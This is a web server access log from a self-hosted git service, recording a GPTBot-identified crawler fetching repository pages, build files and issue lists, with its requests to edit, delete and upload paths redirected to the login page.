"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc" +[17/Feb/2026:17:20:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 10998] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/cmake_install.cmake" +[17/Feb/2026:17:20:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11023] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/cmake_install.cmake" +[17/Feb/2026:17:20:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc?display=source" [Client 74.7.227.38] [Length 108418] [Gzip 18.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc" +[17/Feb/2026:17:20:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc?display=source" [Client 74.7.227.38] [Length 107188] [Gzip 18.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc" +[17/Feb/2026:17:20:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11024] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/cmake_install.cmake" +[17/Feb/2026:17:20:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc?display=source" [Client 74.7.227.38] [Length 108424] [Gzip 18.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/Analysis-00.toc" +[17/Feb/2026:17:20:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11024] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/cmake_install.cmake" +[17/Feb/2026:17:20:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11024] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/cmake_install.cmake" +[17/Feb/2026:17:20:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc?display=source" [Client 74.7.227.38] [Length 107158] [Gzip 18.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/Analysis-00.toc" +[17/Feb/2026:17:20:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake?display=rendered" [Client 74.7.227.38] [Length 11135] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/build/cpp/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:17:20:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/pages/DCS.html?display=rendered" [Client 74.7.227.38] [Length 10895] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/pages/DCS.html" +[17/Feb/2026:17:20:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?files=GoldMonitor%2fGoldMonitor0.py" [Client 74.7.227.38] [Length 31352] [Gzip 6.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor0.py" +[17/Feb/2026:17:20:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?files=PostgresPatrol%2fPostgres.ico" [Client 74.7.227.38] [Length 20553] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Postgres.ico" +[17/Feb/2026:17:20:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 9966] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls" +[17/Feb/2026:17:20:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 9966] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=leastupdate&state=closed&type=all" +[17/Feb/2026:17:20:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 72036] [Gzip 33.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" +[17/Feb/2026:17:20:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/PostgresMonitor/BuildTip.txt" [Client 74.7.227.38] [Length 10446] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/BuildTip.txt" +[17/Feb/2026:17:20:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/Dockerfile?display=source" [Client 74.7.227.38] [Length 12681] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/Dockerfile" +[17/Feb/2026:17:20:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject" [Client 74.7.227.38] [Length 10967] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project" +[17/Feb/2026:17:20:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build_exe.py" [Client 74.7.227.38] [Length 909] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build_exe.py" +[17/Feb/2026:17:20:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldMonitor/gold_price_log.csv" [Client 74.7.227.38] [Length 11208] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor" +[17/Feb/2026:17:20:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/industrial-comm" [Client 74.7.227.38] [Length 10296] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/industrial-comm" +[17/Feb/2026:17:20:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10149] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=farduedate&state=closed&type=all" +[17/Feb/2026:17:20:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10162] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=farduedate&state=closed&type=all" +[17/Feb/2026:17:21:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 9973] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=leastupdate&state=closed&type=all" +[17/Feb/2026:17:21:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresWatchdog/.vscode" [Client 74.7.227.38] [Length 10383] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog" +[17/Feb/2026:17:21:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/GoldPilot/AssetPilot.exe" [Client 74.7.227.38] [Length 11019] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot" +[17/Feb/2026:17:21:01 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PostgresMonitor/BuildTip.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresMonitor/BuildTip.txt" +[17/Feb/2026:17:21:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PostgresMonitor/BuildTip.txt" +[17/Feb/2026:17:21:02 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PostgresMonitor/BuildTip.txt" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresMonitor/BuildTip.txt" +[17/Feb/2026:17:21:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PostgresMonitor/BuildTip.txt" +[17/Feb/2026:17:21:02 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/TestProject" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject" +[17/Feb/2026:17:21:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/TestProject" +[17/Feb/2026:17:21:03 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/C++Project/TestProject" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject" +[17/Feb/2026:17:21:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/C++Project/TestProject" +[17/Feb/2026:17:21:04 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/gold_price_log.csv" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/gold_price_log.csv" +[17/Feb/2026:17:21:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/gold_price_log.csv" +[17/Feb/2026:17:21:04 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/gold_price_log.csv" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/gold_price_log.csv" +[17/Feb/2026:17:21:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/gold_price_log.csv" +[17/Feb/2026:17:21:05 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/TestProject" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject" +[17/Feb/2026:17:21:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/TestProject" +[17/Feb/2026:17:21:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 11625] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject" +[17/Feb/2026:17:21:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 11873] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject" +[17/Feb/2026:17:21:06 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PostgresWatchdog/.vscode" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/.vscode" +[17/Feb/2026:17:21:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PostgresWatchdog/.vscode" +[17/Feb/2026:17:21:07 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/PostgresWatchdog/.vscode" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/.vscode" +[17/Feb/2026:17:21:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/PostgresWatchdog/.vscode" +[17/Feb/2026:17:21:07 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldPilot/AssetPilot.exe" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/AssetPilot.exe" +[17/Feb/2026:17:21:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldPilot/AssetPilot.exe" +[17/Feb/2026:17:21:08 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PostgresWatchdog/.vscode" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/.vscode" +[17/Feb/2026:17:21:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PostgresWatchdog/.vscode" +[17/Feb/2026:17:21:08 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldPilot/AssetPilot.exe" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/AssetPilot.exe" +[17/Feb/2026:17:21:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldPilot/AssetPilot.exe" +[17/Feb/2026:17:21:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldPilot/AssetPilot.exe" [Client 74.7.227.38] [Length 9784] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/AssetPilot.exe" +[17/Feb/2026:17:21:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresWatchdog/.vscode" [Client 74.7.227.38] [Length 9792] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresWatchdog/.vscode" +[17/Feb/2026:17:21:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/build" [Client 74.7.227.38] [Length 11330] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject" +[17/Feb/2026:17:21:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/TestProject/.vscode" [Client 74.7.227.38] [Length 10374] [Gzip 2.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject" +[17/Feb/2026:17:21:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 172] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/main.cpp" +[17/Feb/2026:17:21:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 11037] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/CMakeLists.txt" +[17/Feb/2026:17:21:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 899] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/TestProject/CMakeLists.txt" +[17/Feb/2026:17:21:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 